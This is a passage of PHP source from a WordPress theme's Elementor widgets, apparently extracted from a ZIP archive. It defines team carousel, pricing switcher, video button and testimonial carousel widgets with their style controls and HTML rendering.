		);
		$this->add_control(
			'dots',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'true',
				'options' => [
					'true'   => __( 'Yes', 'maxbizz' ),
					'false'  => __( 'No', 'maxbizz' ),
				],
			]
		);
		$this->add_responsive_control(
			'w_gaps',
			[
				'label' => __( 'Gap Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
			]
		);

		$this->end_controls_section();

		/**TAB_STYLE**/
		$this->start_controls_section(
			'content_style',
			[
				'label' => esc_html__( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-team',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'info_style',
			[
				'label' => esc_html__( 'Info Box', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'heading_info_box',
			[
				'label' => __( 'General', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'text-align: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'padding_box',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .team-info' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'info_box_shadow',
				'selector' => '{{WRAPPER}} .team-info',
			]
		);
		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'title_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'title_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6, {{WRAPPER}} .ot-team h6 a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6 a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name'     => 'title_typography',
				'label'    => esc_html__( 'Typography', 'maxbizz' ),
				'selector' => '{{WRAPPER}} .ot-team h6',
			]
		);

		/* extra */
		$this->add_control(
			'heading_job',
			[
				'label' => __( 'Extra/Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'job_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'job_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-info span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
				[
					'name'     => 'job_typography',
					'label'    => esc_html__( 'Typography', 'maxbizz' ),
					'selector' => '{{WRAPPER}} .team-info span',
				]
		);

		$this->end_controls_section();

		/* socials */
		$this->start_controls_section(
			'icon_style',
			[
				'label' => esc_html__( 'Socials', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'icon_social_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 30,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_socials',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'icon_social_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_social_bg',
			[
				'label'     => esc_html__( 'Background', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_hover_color',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social a:hover svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'social_hover_bg',
			[
				'label'     => esc_html__( 'Background Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'background: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();

		// Dots.
		$this->start_controls_section(
			'navigation_section',
			[
				'label' => __( 'Dots', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'dots' => 'true',
				],
			]
		);

		$this->add_responsive_control(
			'dots_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-dots' => 'bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
            'dots_bgcolor',
            [
                'label' => __( 'Color', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->add_control(
            'dots_active_bgcolor',
            [
                'label' => __( 'Color Active', 'maxbizz' ),
                'type' => Controls_Manager::COLOR,
                'selectors' => [
					'{{WRAPPER}} .owl-dots button.owl-dot.active span' => 'background: {{VALUE}};',
				],
            ]
        );

        $this->end_controls_section();

        // Arrows.
		$this->start_controls_section(
			'style_nav',
			[
				'label' => __( 'Arrows', 'maxbizz' ),
				'tab' => Controls_Manager::TAB_STYLE,
				'condition' => [
					'arrows' => 'true',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => -200,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav .owl-prev' => 'left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .owl-nav .owl-next' => 'right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'arrow_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 30,
						'max' => 70,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'arrow_bg_color',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_hcolor',
			[
				'label' => __( 'Color Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_bg_hcolor',
			[
				'label' => __( 'Background Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .owl-nav button:hover' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'radius_arrow',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .owl-nav button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
		<div class="ot-team-carousel" data-loop="<?php echo $settings['loop']; ?>" data-auto="<?php echo $settings['autoplay']; ?>" data-time="<?php echo $settings['timeout']['size']; ?>" data-arrows="<?php echo $settings['arrows']; ?>" data-dots="<?php echo $settings['dots']; ?>" data-show="<?php echo $settings['tshow']; ?>" data-tshow="<?php echo esc_attr( $settings['tshow_tablet'] ); ?>" data-mshow="<?php echo esc_attr( $settings['tshow_mobile'] ); ?>" data-gaps="<?php echo esc_attr( $settings['w_gaps']['size'] ); ?>" data-tgaps="<?php echo esc_attr( $settings['w_gaps_tablet']['size'] ); ?>" data-mgaps="<?php echo $settings['w_gaps_mobile']['size']; ?>">
			<div class="owl-carousel owl-theme">
				<?php foreach ( $settings['members'] as $key => $mem ) : 
					$photo_url = Group_Control_Image_Size::get_attachment_image_src( $mem['member_image']['id'], 'member_image_size', $settings );
					$photo = '<img src="' . esc_url( $photo_url ) . '" alt="' . esc_attr( $mem['member_name'] ) . '">';
					$tname = $mem['member_name'];

		            if ( ! empty( $mem['link']['url'] ) ) {
						$this->add_render_attribute( 'm_link' . $key, 'href', $mem['link']['url'] );

						if ( $mem['link']['is_external'] ) {
							$this->add_render_attribute( 'm_link' . $key, 'target', '_blank' );
						}

						if ( $mem['link']['nofollow'] ) {
							$this->add_render_attribute( 'm_link' . $key, 'rel', 'nofollow' );
						}
						$photo = '<a ' .$this->get_render_attribute_string( 'm_link' . $key ). '>' .$photo. '</a>';
						$tname = '<a ' .$this->get_render_attribute_string( 'm_link' . $key ). '>' .$tname. '</a>';
					}
				?>
				<div class="ot-team team-2 circle-social">
					<div class="team-thumb">
						<?php if( $mem['member_image']['url'] ) { echo $photo; } ?>
					</div>
					<div class="team-info">
						<?php if ( $mem['member_name'] ) { echo '<h6 class="tname">' .$tname. '</h6>'; } ?>
						<?php if ( $mem['member_extra'] ) { echo '<span>' .$mem['member_extra']. '</span>'; } ?>
						<?php if ( $mem['socials'] ) : ?>
						<div class="team-social">
							<a <?php if( $mem['social1_link']['is_external'] ){ echo 'target="_blank"'; }else{ echo 'rel="nofollow"'; } ?> 
								href="<?php echo $mem['social1_link']['url'];?>">
								<?php Icons_Manager::render_icon( $mem['social1'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
							<?php if ( ! empty( $mem['social2'] ) ) : ?>
							<a <?php if( $mem['social2_link']['is_external'] ){ echo 'target="_blank"'; }else{ echo 'rel="nofollow"'; }?> 
								href="<?php echo $mem['social2_link']['url'];?>">
								<?php Icons_Manager::render_icon( $mem['social2'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
							<?php endif; ?>
							<?php if ( ! empty( $mem['social3'] ) ) : ?>
							<a <?php if( $mem['social3_link']['is_external'] ){ echo 'target="_blank"'; }else{ echo 'rel="nofollow"'; }?> 
								href="<?php echo $mem['social3_link']['url'];?>">
								<?php Icons_Manager::render_icon( $mem['social3'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
							<?php endif; ?>
						</div>  
						<?php endif; ?>
					</div>
				</div>
				<?php endforeach; ?>
			</div>
		</div>
	        
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Team_Carousel class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Team_Carousel() );PK�8FZ����))*inc/backend/elementor/widgets/switcher.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Switcher
 */
class Maxbizz_Switcher extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iswitcher';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Switcher(Pricing Table)', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-dual-button';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Switcher', 'maxbizz' ),
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				// 'prefix_class' => 'maxbizz%s-align-',
				'selectors' => [
					'{{WRAPPER}} .ot-switcher' => 'text-align: {{VALUE}};',
				],
			]
        );
        $this->add_control(
			'title_left',
			[
				'label' => __( 'Title Left', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
                'default' => __( 'Monthly', 'maxbizz' ),
                'label_block' => true,
			]
        );
        $this->add_control(
			'title_right',
			[
				'label' => __( 'Title Right', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
                'default' => __( 'Yearly', 'maxbizz' ),
                'label_block' => true,
			]
		);

		$this->end_controls_section();

		//Styling
	
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Switcher', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
        );
        $this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .switch' => 'margin-left: {{SIZE}}{{UNIT}}; margin-right: {{SIZE}}{{UNIT}};',
				],
			]
        );
        $this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-switcher > span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-switcher > span',
			]
		);

		$this->end_controls_tabs();

		//Title
		$this->add_control(
			'heading_toggle',
			[
				'label' => __( 'Toggle', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'toggle_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .slider' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'toggle_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .slider:before' => 'background: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="ot-switcher">
            <span class="l-switch active"><?php echo $settings['title_left']; ?></span>
                <label class="switch">
                    <input type="checkbox">
                    <span class="slider round"></span>
                </label>
			<span class="r-switch"><?php echo $settings['title_right']; ?></span>
		</div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Switcher() );PK�8FZ/sx x .inc/backend/elementor/widgets/video-button.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Video Button
 */
class Maxbizz_VideoPopup extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ivideopopup';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Video Button', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-youtube';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Button', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'flex-start'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'flex-end' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-video-button' => 'justify-content: {{VALUE}};',
				],
				'default' => '',
			]
		);

		$this->add_control(
			'vlink',
			[
				'label' => __( 'Video Link', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
			]
		);

		$this->add_control(
			'caption',
			[
				'label' => __( 'Caption', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
			]
		);

		$this->add_control(
			'animate',
			[
				'label' => __( 'Animation', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_section',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Button
		$this->add_responsive_control(
			'btn_width',
			[
				'label' => __( 'Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 10,
						'max' => 500,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .btn-play' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}; line-height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'btn_size',
			[
				'label' => __( 'Icon Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .btn-play i:before' => 'font-size: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->start_controls_tabs( 'tabs_button_icon_style' );

		$this->start_controls_tab(
			'tab_button_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_border_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play' => 'border-color: {{VALUE}};',
					'{{WRAPPER}} .btn-play span' => 'border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_bg',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_circle',
			[
				'label' => __( 'Animation Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play span' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'animate'  => 'yes'
				]
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_button_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'btn_hover_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play:hover' => 'color: {{VALUE}};',
					'{{WRAPPER}} .btn-play:hover span' => 'border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn__hover_border_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play:hover' => 'border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_hover_bg',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play:hover' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_hover_circle',
			[
				'label' => __( 'Animation Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .btn-play:hover span' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'animate'  => 'yes'
				]
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();	

		$this->end_controls_section();

		$this->start_controls_section(
			'caption_section',
			[
				'label' => __( 'Caption', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
				'condition' => [
					'caption!'  => ''
				]
			]
		);

		$this->add_control(
			'caption_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-video-button > span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'caption_typography',
				'selector' => '{{WRAPPER}} .ot-video-button > span',
			]
		);
		$this->add_responsive_control(
			'caption_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-video-button > span' => 'margin-left: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {

		$settings = $this->get_settings_for_display();

		$this->add_render_attribute( 'button', 'class', 'btn-play' );

		?>
		
		<div class="ot-video-button flex-middle">
	        <a <?php echo $this->get_render_attribute_string( 'button' ); ?> href="<?php echo esc_url( $settings['vlink'] ); ?>">
				<i class="ot-flaticon-play"></i>
				<?php if( $settings['animate'] ) { echo '<span class="circle-1"></span>'; } ?>
	        </a>
	        <?php if( $settings['caption'] ) echo '<span class="font-second">' .$settings['caption']. '</span>'; ?>
	    </div>
	    
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_VideoPopup class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_VideoPopup() );PK�8FZ=�%iCiC9inc/backend/elementor/widgets/testimonials-carousel-1.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Testimonial Carousel 1
 */
class Maxbizz_Testimonials extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'itestimonials';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Testimonial Carousel 1', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-testimonial-carousel';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'section_testimonials',
			[
				'label' => __( 'Testimonials', 'maxbizz' ),
			]
		);
		$repeater = new Repeater();
		$repeater->add_control(
			'timage',
			[
				'label' => __( 'Avatar:', 'maxbizz' ),
				'type' => Controls_Manager::MEDIA,
				'default' => [
					'url' => get_template_directory_uri().'/images/avatar-3.png',
				]
			]
		);

		$repeater->add_control(
			'tname',
			[
				'label' => __( 'Name:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Emilia Clarke',
			]
		);

		$repeater->add_control(
			'tjob',
			[
				'label' => __( 'Job:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => 'Developer',
			]
		);
		$repeater->add_control(
			'tcontent',
			[
				'label' => __( 'Content:', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'rows' => '10',
				'default' => '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."',
			]
		);

		$this->add_control(
		    'testi_slider',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'default'     => [
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Oliver Simson',
						'tjob'	  => 'Developer'
		 
		            ],
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Mary Grey',
						'tjob'	  => 'Manager'
		 
		            ],
		            [
		             	'tcontent' => __( '"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."', 'maxbizz' ),
		                'timage'  => [
							'url' => get_template_directory_uri().'/images/avatar-1.png',
						],
						'tname'	  => 'Samanta Fox',
						'tjob'	  => 'Designer'
		 
		            ]
		            
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{tname}}}',
		    ]
		);
		$slides_show = range( 1, 4 );
		$slides_show = array_combine( $slides_show, $slides_show );

		$this->add_responsive_control(
			'tshow',
			[
				'label' => __( 'Slides To Show', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
